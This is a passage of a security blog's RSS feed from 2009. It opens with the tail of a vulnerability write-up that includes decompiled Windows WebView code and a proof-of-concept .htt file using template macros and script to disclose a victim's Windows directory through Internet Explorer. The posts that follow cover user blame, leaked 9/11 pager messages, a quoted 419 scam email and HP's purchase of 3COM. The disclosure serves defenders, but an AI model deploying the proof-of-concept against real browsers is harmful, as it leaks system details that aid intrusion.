         SHUnicodeToTChar((LPCWSTR)pBuf, psz, cch);
    }
}

void ExpandMacro(LPBYTE pszMacro, LPBYTE pszExpansion, int nBytes, UINT nCharSize) {

    TCHAR szExpansion[MAX_PATH];
    szExpansion[0] = TEXT('');
    TCHAR szTCharMacro[MAX_PATH];

    ConvertBytesToTChar(pszMacro, nCharSize, szTCharMacro, ARRAYSIZE(szTCharMacro));
    TCHAR szKey[MAX_PATH];
    lstrcpyn(szKey, REG_WEBVIEW_TEMPLATE_MACROS, ARRAYSIZE(szKey));
    StrCatBuff(szKey, TEXT("\"), ARRAYSIZE(szKey));
    StrCatBuff(szKey, szTCharMacro, ARRAYSIZE(szKey));
    HKEY hkMacros;

    if (RegOpenKey(HKEY_CURRENT_USER, szKey, &amp;hkMacros) == ERROR_SUCCESS &amp;&amp; RegOpenKey(HKEY_LOCAL_MACHINE, szKey, &amp;hkMacros) == ERROR_SUCCESS) {
        DWORD dwType;
        DWORD cbData = SIZEOF(szExpansion);
        SHQueryValueEx(hkMacros, NULL, NULL, &amp;dwType, (LPBYTE)szExpansion, &amp;cbData);
        RegCloseKey(hkMacros);
    }

    ConvertTCharToBytes(szExpansion, nCharSize, pszExpansion, nBytes);
}

int CWebViewMimeFilter::_Expand(LPBYTE pszVar, LPBYTE * ppszExp) {
    if (!_StrCmp(pszVar, "TEMPLATEDIR", L"TEMPLATEDIR")) {
        if (!_szTemplateDirPath[0]) {
            GetMachineTemplateDir(_szTemplateDirPath, SIZEOF(_szTemplateDirPath), _nCharSize);
         }

         *ppszExp = _szTemplateDirPath;

    } else if (!_StrCmp(pszVar, "THISDIRPATH", L"THISDIRPATH")) {
        if (!_szThisDirPath[0]) {
            _QueryForDVCMDID(DVCMDID_GETTHISDIRPATH, _szThisDirPath, SIZEOF(_szThisDirPath));
        }
        *ppszExp = _szThisDirPath;

    } else if (!_StrCmp(pszVar, "THISDIRNAME", L"THISDIRNAME")) {
        if (!_szThisDirName[0]) {
            _QueryForDVCMDID(DVCMDID_GETTHISDIRNAME, _szThisDirName, SIZEOF(_szThisDirName));
        }
        *ppszExp = _szThisDirName;

    } else {
        ExpandMacro(pszVar, _szExpansion, SIZEOF(_szExpansion), _nCharSize);
        *ppszExp = _szExpansion;
    }

    return _StrLen(*ppszExp);
}
</pre>
<p>In Windows XP the variables &#8220;%THISDIRPATH%&#8221; and &#8220;%THISDIRNAME%&#8221; were removed from the Mime Filter which means %TEMPLATEDIR%, %BACKGROUNDIMAGE% and %LOGOLINE% would still be translated into the current windows directory.</p>
<p>The Proof Of Concept code (Remote WebView Macro Translation):<br />
Save on a remote host with an htt extension and replace &#8220;http:///filter_trap.htt</p>
<pre>--------------------------- filter_trap.htt start ------------------
[div id="BACKGROUNDIMAGE"]%BACKGROUNDIMAGE%[/div]
[div id="LOGOLINE"]%LOGOLINE%[/div]
[div id="TEMPLATEDIR"]%TEMPLATEDIR%[/div]
[script]
alert(document.getElementById("BACKGROUNDIMAGE").innerHTML);
alert(document.getElementById("LOGOLINE").innerHTML);
alert(document.getElementById("TEMPLATEDIR").innerHTML);
[/script]
--------------------------- filter_trap.htt end -------------------</pre>
<p>Microsoft was notified a few months ago, the problem will be fixed.
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1335&amp;title=Exploiting+WebView+through+Internet+Explorer+to+remotely+discover+windows+directory"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1335&amp;title=Exploiting+WebView+through+Internet+Explorer+to+remotely+discover+windows+directory"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=Exploiting+WebView+through+Internet+Explorer+to+remotely+discover+windows+directory&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1335"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1335"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1335&amp;title=Exploiting+WebView+through+Internet+Explorer+to+remotely+discover+windows+directory"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1335&amp;title=Exploiting+WebView+through+Internet+Explorer+to+remotely+discover+windows+directory"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1335&amp;title=Exploiting+WebView+through+Internet+Explorer+to+remotely+discover+windows+directory"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1335&amp;t=Exploiting+WebView+through+Internet+Explorer+to+remotely+discover+windows+directory"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1335&amp;title=Exploiting+WebView+through+Internet+Explorer+to+remotely+discover+windows+directory"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1335"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=Exploiting+WebView+through+Internet+Explorer+to+remotely+discover+windows+directory&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1335" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Expose the security holes in your products during development. <a href="http://www.beyondsecurity.com/black-box-testing.html">Black Box Testing</a> makes it safer!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1335/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Stop blaming us</title>
		<link>http://blogs.securiteam.com/index.php/archives/1334</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1334#comments</comments>
		<pubDate>Thu, 26 Nov 2009 00:13:43 +0000</pubDate>
		<dc:creator>Aviram</dc:creator>
		
		<category>Web</category>

		<category>Commentary</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1334</guid>
		<description><![CDATA[Occasionally, I see articles like this.
Hackers don&#8217;t, as a rule, need to go to such lengths to crack passwords. That&#8217;s because most of us fail to follow good security habits. A recent article on PhysOrg cites a study that found people are the weak link in computer security.
This is silly. People don&#8217;t need to &#8220;follow [...]]]></description>
			<content:encoded><![CDATA[<p>Occasionally, I see articles like <a href="http://news.discovery.com/tech/the-biggest-threat-to-your-online-security-isyou.html">this</a>.</p>
<blockquote><p>Hackers don&#8217;t, as a rule, need to go to such lengths to crack passwords. That&#8217;s because most of us fail to follow good security habits. A recent article on PhysOrg cites a study that found people are the weak link in computer security.</p></blockquote>
<p>This is silly. People don&#8217;t need to &#8220;follow good security habits&#8221; unless they have &#8220;security&#8221; somewhere in their title. Security is a means to an end, and not the target. The target is to get the job done (or surf the web, or read your emails).</p>
<p>Saying this is not just silly - it&#8217;s also dangerous. When experts say &#8220;people are the weakest link in computer security&#8221;, they remove all responsibility from the security industry to make security better, and easier, for users. Why work on preventing brute-force attacks on passwords? Instead lets force our users to choose a 10 character password including at least 1 number and 1 letter of each case. Oh, and lets prevent those walking security hazards from saving the password in the browser on their malware infested machines. Yeah, that&#8217;ll teach them. The article over at discovery.com suggests I use <strong>e$4WruX7</strong> as a password - a most helpful advice if I ever saw one. Here&#8217;s a better suggestion for you Jonathan: have the system lock out for 24 hours after 3 failed tries.That will make guessing a simple 6 digit-only PIN take more than 450 years.</p>
<p>Enough with this.  Users are not the weakest link any more than drivers are the weakest link in driving accidents. Sure, if we remove users (or drivers) from the equation, that solves all our problems. But since we can&#8217;t do that, lets focus on making seat belts, and airbags, and warning systems. Or <strong>easier</strong> (not harder!) password systems, better protected servers and better user interface.
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1334&amp;title=Stop+blaming+us"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1334&amp;title=Stop+blaming+us"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=Stop+blaming+us&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1334"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1334"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1334&amp;title=Stop+blaming+us"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1334&amp;title=Stop+blaming+us"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1334&amp;title=Stop+blaming+us"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1334&amp;t=Stop+blaming+us"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1334&amp;title=Stop+blaming+us"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1334"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=Stop+blaming+us&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1334" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Make your website safer. Use an external <a href="http://www.beyondsecurity.com/vulnerability-scanner.html">vulnerability scanner</a>. Nothing to install, zero maintenance!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1334/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to analyze timeline of 9/11 attacks - read pager traffic from N.Y. and Washington</title>
		<link>http://blogs.securiteam.com/index.php/archives/1286</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1286#comments</comments>
		<pubDate>Wed, 25 Nov 2009 22:00:23 +0000</pubDate>
		<dc:creator>Juha-Matti</dc:creator>
		
		<category>Web</category>

		<category>Commentary</category>

		<category>Full Disclosure</category>

		<category>Corporate Security</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1286</guid>
		<description><![CDATA[Wikileaks has released hundreds of thousands pager messages from 11th September, 2001.
Link: 911.wikileaks.org/
Listings say that the messages are sent in networks of Arch Wireless, Metrocall, and SkyTel.

-
Make your website safer. Use an external vulnerability scanner. Nothing to install, zero maintenance!
]]></description>
			<content:encoded><![CDATA[<p>Wikileaks has released hundreds of thousands pager messages from 11th September, 2001.</p>
<p>Link: <a href="http://911.wikileaks.org/">911.wikileaks.org/</a></p>
<p><a href="http://911.wikileaks.org/files/index.html">Listings</a> say that the messages are sent in networks of Arch Wireless, Metrocall, and SkyTel.
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1286&amp;title=How+to+analyze+timeline+of+9%2F11+attacks+-+read+pager+traffic+from+N.Y.+and+Washington"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1286&amp;title=How+to+analyze+timeline+of+9%2F11+attacks+-+read+pager+traffic+from+N.Y.+and+Washington"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=How+to+analyze+timeline+of+9%2F11+attacks+-+read+pager+traffic+from+N.Y.+and+Washington&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1286"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1286"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1286&amp;title=How+to+analyze+timeline+of+9%2F11+attacks+-+read+pager+traffic+from+N.Y.+and+Washington"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1286&amp;title=How+to+analyze+timeline+of+9%2F11+attacks+-+read+pager+traffic+from+N.Y.+and+Washington"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1286&amp;title=How+to+analyze+timeline+of+9%2F11+attacks+-+read+pager+traffic+from+N.Y.+and+Washington"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1286&amp;t=How+to+analyze+timeline+of+9%2F11+attacks+-+read+pager+traffic+from+N.Y.+and+Washington"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1286&amp;title=How+to+analyze+timeline+of+9%2F11+attacks+-+read+pager+traffic+from+N.Y.+and+Washington"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1286"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=How+to+analyze+timeline+of+9%2F11+attacks+-+read+pager+traffic+from+N.Y.+and+Washington&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1286" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Make your website safer. Use an external <a href="http://www.beyondsecurity.com/vulnerability-scanner.html">vulnerability scanner</a>. Nothing to install, zero maintenance!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1286/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Is this the laziest 419 of all time?</title>
		<link>http://blogs.securiteam.com/index.php/archives/1331</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1331#comments</comments>
		<pubDate>Sat, 14 Nov 2009 20:31:16 +0000</pubDate>
		<dc:creator>David Harley</dc:creator>
		
		<category>Commentary</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1331</guid>
		<description><![CDATA[Subject: the sum of 1,000,000.00 Pounds
From: British Tobacco Promo
[Most of the address fields spoofed a US educational institution, though the reply-to was an address in China.]
Message Body:
You have won 1,000,000.00 Reply us with  your  details
Name:Occupation:Country:Sex
[This message is actually several weeks old, but I just spotted it while cleaning up one of my mailboxes. Could any [...]]]></description>
			<content:encoded><![CDATA[<p>Subject: the sum of 1,000,000.00 Pounds<br />
From: British Tobacco Promo</p>
<p>[<em>Most of the address fields spoofed a US educational institution, though the reply-to was an address in China.</em>]</p>
<p>Message Body:</p>
<p>You have won 1,000,000.00 Reply us with  your  details<br />
Name:Occupation:Country:Sex</p>
<p>[<em>This message is actually several weeks old, but I just spotted it while cleaning up one of my mailboxes. Could any potential victim honestly be that naive?</em>]</p>
<p>David Harley FBCS CITP CISSP<br />
Director of Malware Intelligence, ESET</p>
<p>Also blogging at:<br />
<a href="http://dharley.wordpress.com/"> http://dharley.wordpress.com/</a><br />
<a href="http://www.eset.com/threat-center/blog"> http://www.eset.com/threat-center/blog</a><br />
<a href="http://avien.net/blog"> http://avien.net/blog</a><br />
<a href="http://blog.isc2.org/"> http://blog.isc2.org/</a>
<div><a href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1331&amp;title=Is+this+the+laziest+419+of+all+time%3F"rel="nofollow"  title="Digg"><img src="http://blogs.securiteam.com/wp-content/socializer-images/digg.png" title="Digg" alt="Digg" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://reddit.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1331&amp;title=Is+this+the+laziest+419+of+all+time%3F"rel="nofollow"  title="Reddit"><img src="http://blogs.securiteam.com/wp-content/socializer-images/reddit.png" title="Reddit" alt="Reddit" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://slashdot.org/bookmark.pl?title=Is+this+the+laziest+419+of+all+time%3F&amp;url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1331"rel="nofollow"  title="Slashdot"><img src="http://blogs.securiteam.com/wp-content/socializer-images/slashdot.png" title="Slashdot" alt="Slashdot" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://twitthis.com/twit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1331"rel="nofollow"  title="TwitThis"><img src="http://blogs.securiteam.com/wp-content/socializer-images/twitter.png" title="TwitThis" alt="TwitThis" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://sphinn.com/submit.php?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1331&amp;title=Is+this+the+laziest+419+of+all+time%3F"rel="nofollow"  title="Sphinn"><img src="http://blogs.securiteam.com/wp-content/socializer-images/sphinn.png" title="Sphinn" alt="Sphinn" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1331&amp;title=Is+this+the+laziest+419+of+all+time%3F"rel="nofollow"  title="StumbleUpon"><img src="http://blogs.securiteam.com/wp-content/socializer-images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://del.icio.us/post?url=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1331&amp;title=Is+this+the+laziest+419+of+all+time%3F"rel="nofollow"  title="del.icio.us"><img src="http://blogs.securiteam.com/wp-content/socializer-images/delicious.png" title="del.icio.us" alt="del.icio.us" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1331&amp;t=Is+this+the+laziest+419+of+all+time%3F"rel="nofollow"  title="Facebook"><img src="http://blogs.securiteam.com/wp-content/socializer-images/facebook.png" title="Facebook" alt="Facebook" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1331&amp;title=Is+this+the+laziest+419+of+all+time%3F"rel="nofollow"  title="Google"><img src="http://blogs.securiteam.com/wp-content/socializer-images/googlebookmark.png" title="Google" alt="Google" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="http://technorati.com/faves?add=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1331"rel="nofollow"  title="Technorati"><img src="http://blogs.securiteam.com/wp-content/socializer-images/technorati.png" title="Technorati" alt="Technorati" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a><a href="mailto:?subject=Is+this+the+laziest+419+of+all+time%3F&amp;body=http%3A%2F%2Fblogs.securiteam.com%2Findex.php%2Farchives%2F1331" title="E-mail this story to a friend!"><img src="http://blogs.securiteam.com/wp-content/socializer-images/email_link.png"rel="nofollow"  title="E-mail this story to a friend!" alt="E-mail this story to a friend!" style="margin:5px; border:0px; opacity: .4; -moz-opacity: .4; filter: alpha(opacity=40);" /></a></div>
<p>-</p>
<p>Make your website safe from SQL Injection attacks. Signup for a daily <a href="http://www.beyondsecurity.com/penetration-testing.html">penetration testing</a> to protect your network!</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.securiteam.com/index.php/archives/1331/feed/</wfw:commentRss>
		</item>
		<item>
		<title>HP buys 3COM: how will that impact ZDI?</title>
		<link>http://blogs.securiteam.com/index.php/archives/1330</link>
		<comments>http://blogs.securiteam.com/index.php/archives/1330#comments</comments>
		<pubDate>Thu, 12 Nov 2009 19:55:35 +0000</pubDate>
		<dc:creator>Aviram</dc:creator>
		
		<category>Commentary</category>

		<category>Full Disclosure</category>

		<category>Culture</category>

		<guid isPermaLink="false">http://blogs.securiteam.com/index.php/archives/1330</guid>
		<description><![CDATA[What happens if your job is to sell to customers information about embarrassing vendor vulnerabilities, and then your company gets bought by one of the vendors you are reporting about?
Going back to cheesy analogies this is the age old question, can god create a stone so heavy that he cannot lift?
The case in question is [...]]]></description>
			<content:encoded><![CDATA[<p>What happens if your job is to sell to customers information about embarrassing vendor vulnerabilities, and then your company gets bought by one of the vendors you are reporting about?</p>
<p>Going back to cheesy analogies this is the age old question, can god create a stone so heavy that he cannot lift?</p>
<p>The case in question is HP buying 3COM (which owns the Zero Day initiative), and as HD Moore correctly <a href="http://twitter.com/hdmoore/status/5629710613">pointed out</a> there&#8217;s bound to be some conflict there.<br />
This will  be an interesting match to watch. First, the stone is very heavy. Knowing the ZDI team (*) they have been very successful at staying independent inside the huge 3com corporate, and my money would be on them succeeding to do it again.</p>
<p>But when we ask if HP can lift this proverbial stone, lets remember that HP was the only large vendor to pull out the nuclear weapon of <a href="http://news.cnet.com/2100-1023-947325.html?tag=mncol;txt">threatening to sue a security researcher</a> for making their flaws public. Now it&#8217;s a group within their own organization, selling information about <a href="http://www.zerodayinitiative.com/advisories/upcoming/">unfixed HP flaws</a> to paying customers, and paying the same researchers HP wanted to sue 7 years ago.</p>
<p>(*) Full Disclosure: We run <a href="http://www.beyondsecurity.com/ssd.html">an alternative service to ZDI</a> called SecuriTeam Secure Disclosure. That doesn&#8217;t take anything from my respect to the ZDI guys and what they&#8217;ve been doing.
